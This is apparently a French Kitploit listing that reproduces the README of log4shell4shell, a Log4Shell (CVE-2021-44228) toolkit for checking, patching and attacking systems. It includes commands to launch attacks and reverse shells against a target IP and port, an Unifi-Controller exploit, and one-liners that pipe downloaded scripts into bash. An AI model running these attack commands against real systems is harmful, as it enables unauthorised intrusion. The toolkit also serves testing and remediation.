Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Trouver, corriger et tester les vulnérabilités CVE-2021-44228 possibles - fournit un environnement complet de test/attaque LOG4SHELL sur shell | Kitploit
Outils/GitHubGitHub/suuhm/log4shell4shell
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Trouver, corriger et tester les vulnérabilités CVE-2021-44228 possibles - fournit un environnement complet de test/attaque LOG4SHELL sur shell

Voir le dépôt
510il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4shell4shell

Log4j - Multitool. Trouver et corriger les vulnérabilités possibles CVE-2021-44228 - fournit un environnement complet de test/attaque LOG4SHELL

Thumb

Fonctionnalités

  • Vérifiez votre système Linux/Mac/BSD et Windows pour les vulnérabilités CVE-2021-44228
  • Corrigez votre système en supprimant la classe Java log4j / ou en définissant certaines variables d'environnement
  • Preuve de concept : vous pouvez exécuter un serveur Spring Boot factice pour tester l'exploit vous-même (https://github.com/christophetd/log4shell-vulnerable-app)
  • Vous pouvez lancer une attaque contre une IP-Port souhaitée et inclure une commande Base64 / ou un simple Reverse Shell
  • Scan de plage IP complet par https://github.com/fullhunt/log4j-scan

Comment exécuter sur Linux/Mac/BSD :

Prérequis :

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu : apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse : zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS : yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg : pkg install default-jre screen python3-pip curl
  • Mac OS (Brew) : /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

Vérification rapide de votre système avec cette commande sur une ligne :

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

Plus d'options

Lancer un exemple d'attaque contre IP: 10.4.4.20 Port 8080 loginpage et en plus un Reverse Shell :

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

Exécutez screen -r l4s4s-ldap-srv et/ou screen -r l4s4s-nc-rsh pour voir quelques informations d'attaque dans le shell du serveur d'exploitation :

Lancer un scan complet IP: 10.4.4.20 Port 8080 et en plus un essai de tous les tests :

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Lancer une preuve de concept sur un serveur Tomcat Spring Boot :

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Lancer une attaque/vérification d'exploit Unifi-Controller (sur 10.4.4.20:8443) :

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

Toutes les options disponibles

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Exécution du framework Log4shell et de la boîte à outils de vérification sur le shell v0.1a (C) 2021 suuhm

Mauvaise entrée ! Veuillez saisir l'une de ces options :

Utilisation : ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

Comment mettre à niveau votre version python linux et/ou macos :

Exécutez simplement mon script d'aide (--list-versions) : ./python-upgrader.sh

Comment exécuter sur Windows x86 / x64 :

Exécutez simplement dans Powershell (mode admin) : .\set_windows_fix.ps1

Ce script est en alpha ! N'hésitez pas à me faire savoir si vous rencontrez des problèmes

Avertissement légal

Le projet log4shell4shell est conçu uniquement à des fins éducatives et de tests éthiques. L'utilisation de log4j-scan pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, nationales et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.

Télécharger l’outil